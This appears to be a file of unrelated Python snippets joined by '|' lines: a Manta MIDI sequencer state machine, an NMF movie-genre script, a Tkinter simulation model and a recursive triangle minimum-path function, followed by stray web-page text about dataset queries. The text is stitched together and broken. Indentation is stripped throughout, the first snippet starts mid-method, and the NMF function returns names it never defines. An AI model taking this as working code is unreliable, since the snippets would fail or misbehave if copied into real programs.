intensity = 0
pad_num = pad_from_note(step.note)
self.manta_seq.set_pad_intensity(pad_num, intensity)
def prefill_steps(self):
'''
If the mantaseq has any notes or sliders already selected,
assign them to the notes.
'''
selected_note = self.manta_seq._selected_note
if selected_note is not None:
self.manta_seq._seq.set_note(selected_note[0])
self.manta_seq._seq.set_velocity(selected_note[1])
selected_cc1 = self.manta_seq._selected_cc1
if selected_cc1 is not None:
self.manta_seq._seq.set_cc1(selected_cc1)
selected_cc2 = self.manta_seq._selected_cc2
if selected_cc2 is not None:
self.manta_seq._seq.set_cc2(selected_cc2)
class MantaSeqIdleState(MantaSeqState):
def process_step_press(self, step_num):
self.manta_seq._seq.select_step(step_num)
self.set_note_intensity_from_step_num(step_num, True)
self.prefill_steps()
if self.manta_seq._selected_note is not None:
self.manta_seq.set_pad_active(step_num, True)
self.manta_seq._state = MantaSeqStepsSelectedState(self.manta_seq)
def process_shift_press(self):
self.manta_seq._state = MantaSeqShiftedState(self.manta_seq)
def process_note_velocity(self, pad_num, velocity):
note_num = note_from_pad(pad_num)
self.manta_seq._send_midi_note(note_num, velocity)
def process_note_value(self, pad_num, value):
note_num = note_from_pad(pad_num)
if value > 0:
self.manta_seq._selected_note = (note_num, value)
else:
self.manta_seq._selected_note = None
def process_slider_value(self, slider_num, value):
cc_value = int(value * 127)
if slider_num == 0:
self.manta_seq._global_cc1 = cc_value
self.manta_seq._selected_cc1 = cc_value
else:
self.manta_seq._global_cc2 = cc_value
self.manta_seq._selected_cc2 = cc_value
self.manta_seq._send_midi_cc(slider_num + 1, cc_value)
def process_slider_release(self, slider_num):
if slider_num == 0:
self.manta_seq._selected_cc1 = None
else:
self.manta_seq._selected_cc2 = None
class MantaSeqStepsSelectedState(MantaSeqState):
def process_step_press(self, step_num):
self.manta_seq._seq.select_step(step_num)
self.set_note_intensity_from_step_num(step_num, True)
self.prefill_steps()
if self.manta_seq._selected_note is not None:
self.manta_seq.set_pad_active(step_num, True)
def process_step_release(self, step_num):
self.manta_seq._seq.deselect_step(step_num)
self.set_note_intensity_from_step_num(step_num, False)
if len(self.manta_seq._seq.selected_steps) == 0:
self.manta_seq._state = MantaSeqIdleState(self.manta_seq)
# TODO: make sure all pads have intensity of 0, otherwise they
# could get stuck on, as the intensity doesn't get updated unless
# there are steps selected
def process_note_value(self, pad_num, value):
note_num = note_from_pad(pad_num)
self.manta_seq._seq.set_note(note_num)
self.manta_seq._seq.set_velocity(value)
# note - this isn't very efficient. if necessary we should
# use the set_row_led API call
for i in range(48):
if i != pad_num:
self.manta_seq.set_pad_intensity(i, 0)
self.manta_seq.set_pad_intensity(pad_num, value)
if value > 0:
self.manta_seq._selected_note = (note_num, value)
else:
self.manta_seq._selected_note = None
# then update the pad colors of any selected pads
for i, step in enumerate(self.manta_seq._seq.steps):
if step in self.manta_seq._seq.selected_steps:
active = (value > 0)
self.manta_seq.set_pad_active(i, active)
def process_slider_value(self, slider_num, value):
if slider_num == 0:
self.manta_seq._seq.set_cc1(int(value * 127))
else:
self.manta_seq._seq.set_cc2(int(value * 127))
class MantaSeqShiftedState(MantaSeqState):
def process_shift_release(self):
self.manta_seq._state = MantaSeqIdleState(self.manta_seq)
def process_slider_value(self, slider_num, value):
if slider_num == 0:
self.manta_seq._state = MantaSeqTempoAdjustState(
self.manta_seq, value,
self.manta_seq.step_duration)
def process_step_press(self, step_num):
'''Shifted step select erases that note'''
self.manta_seq.set_pad_active(step_num, False)
self.manta_seq._seq.select_step(step_num)
self.manta_seq._seq.set_velocity(0)
self.manta_seq._seq.set_cc1(0)
self.manta_seq._seq.set_cc2(0)
self.manta_seq._seq.deselect_step(step_num)
class MantaSeqTempoAdjustState(MantaSeqState):
def __init__(self, manta_seq, slide_begin, initial_duration):
'Takes the initial value of the slider so we can reference against it'
super(MantaSeqTempoAdjustState, self).__init__(manta_seq)
self.slide_begin = slide_begin
self.initial_duration = initial_duration
def process_shift_release(self):
self.manta_seq._state = MantaSeqIdleState(self.manta_seq)
def process_slider_value(self, slider_num, value):
if slider_num == 0:
# the exponent should be between -1 and 1. Note that we're working
# with duration instead of tempo so the exponiation is backwards
exponent = (self.slide_begin - value)
self.manta_seq.step_duration = self.initial_duration * 2 ** exponent
def process_slider_release(self, slider_num):
self.manta_seq._state = MantaSeqShiftedState(self.manta_seq)
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 12 19:19:35 2015
@author: LIght
"""
from sklearn.decomposition import ProjectedGradientNMF
import utility
import numpy as np
import pandas as pd
##use of NMF
class NMF:
@staticmethod
def groupMovieGenre(user_item_matrix,item_df):
genre_num = 50
A = np.array(user_item_matrix)
nmf_model = ProjectedGradientNMF(n_components = genre_num, init='random', random_state=0)
nmf_model.fit(A)
## decomposited user np array, W represent sementic user info
W = nmf_model.fit_transform(A)
## decomposited item np array, H represent sementic item info
H = nmf_model.components_
## movie is df of each movie and it's probablity to each category
movie = pd.DataFrame(H).T
movie = pd.concat([movie,item_df],axis=1)
movie_genre = ['Action', 'Adventure', 'Animation', 'Children', 'Comedy', 'Crime', 'Documentary', 'Drama', 'Fantasy', 'Film-Noir', 'Horror', 'Musical', 'Mystery', 'Romance', 'Sci-Fi', 'Thriller', 'War', 'Western']
## return ret, 50 group related with movie genre
ret = pd.DataFrame(movie[movie[0]>5][movie_genre].sum(axis=0))
for i in range(genre_num):
ret[str(i)] = pd.DataFrame(movie[movie[i]>5][movie_genre].sum(axis=0))
return ret_nmf, movie_nmf
|
import controller
import model # See how update_all should pass on a reference to this module
#Use the reference to this module to pass it to update methods
from ball import Ball
from floater import Floater
from blackhole import Black_Hole
from pulsator import Pulsator
from hunter import Hunter
from special import Special
# Global variables: declare them global in functions that assign to them: e.g., ... = or +=
running = False
cycle_count = 0
simultons = set()
current_action = None #used to remember what object to add/remove
#return a 2-tuple of the width and height of the canvas (defined in the controller)
def world():
return (controller.the_canvas.winfo_width(),controller.the_canvas.winfo_height())
#reset all module variables to represent an empty/stopped simulation
def reset ():
global running, cycle_count, simultons
running = False
cycle_count = 0
simultons = set()
#start running the simulation
def start ():
global running
running = True
#stop running the simulation (freezing it)
def stop ():
global running
running = False
#step just one update in the simulation
def step ():
global cycle_count, running
cycle_count += 1
for b in simultons:
b.update(model)
running = False
#remember the kind of object to add to the simulation when an (x,y) coordinate in the canvas
# is clicked next (or remember to remove an object by such a click)
def select_object(kind):
global current_action
current_action = kind
#add the kind of remembered object to the simulation (or remove all objects that contain the
# clicked (x,y) coordinate
def mouse_click(x,y):
if current_action == 'Remove':
objs_to_remove =[]
for simulton in simultons:
if simulton.contains((x,y)):
objs_to_remove.append(simulton)#code for removing clicked object from simultons
for obj in objs_to_remove:
remove(obj)
else:
if current_action in {'Ball','Floater','Black_Hole','Pulsator','Hunter','Special'}: #use eval later for easier scaling
if current_action == 'Ball':
simultons.add( Ball(x,y))
elif current_action == 'Floater':
simultons.add( Floater(x,y))
elif current_action == 'Black_Hole':
simultons.add( Black_Hole(x,y))
elif current_action == 'Pulsator':
simultons.add( Pulsator(x,y))
elif current_action == 'Hunter':
simultons.add( Hunter(x,y))
elif current_action == 'Special':
simultons.add( Special(x,y))
else:
pass # do nothing because not valid button to do anything on screen with
#add simulton s to the simulation
def add(s):
simultons.add(s)
# remove simulton s from the simulation
def remove(s):
simultons.remove(s)
#find/return a set of simultons that each satisfy predicate p
def find(p):
s = set()
for b in simultons:
if p(b):
s.add(b)
return s
#call update for each simulton in this simulation (pass model as an argument)
#this function should loop over one set containing all the simultons
# and should not call type or isinstance: let each simulton do the
# right thing for itself, without this function knowing what kinds of
# simultons are in the simulation
def update_all():
global cycle_count
try:
if running:
cycle_count += 1
for b in simultons:
b.update(model)
except:
pass
#For animation: (1st) delete all simultons on the canvas; (2nd) call display on
# all simulton being simulated, adding each back to the canvas, maybe in a
# new location; (3rd) update the label defined in the controller for progress
#this function should loop over one set containing all the simultons
# and should not call type or isinstance: let each simulton do the
# right thing for itself, without this function knowing what kinds of
# simultons are in the simulation
def display_all():
for o in controller.the_canvas.find_all():
controller.the_canvas.delete(o)
for b in simultons:
b.display(controller.the_canvas)
controller.the_progress.config(text=str(len(simultons)) + " simultons/" + str(cycle_count) + " cycles")
|
def mintot(triangle):
n = len(triangle)
if n == 1:
return triangle[0][0]
if n == 2:
arr = triangle[1]
if arr[0] < arr[1]:
return triangle[0][0] + arr[0]
else:
return triangle[0][0] + arr[1]
elif n > 2:
bob1 = []
bob2 = []
for i in range(1,n):
u=[]
v=[]
for j in range(i):
u.append(triangle[i][j])
v.append(triangle[i][j+1])
bob1.append(u)
bob2.append(v)
t1=mintot(bob1)
t2=mintot(bob2)
if t1 < t2:
return triangle[0][0] + t1
else:
return triangle[0][0] + t2
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.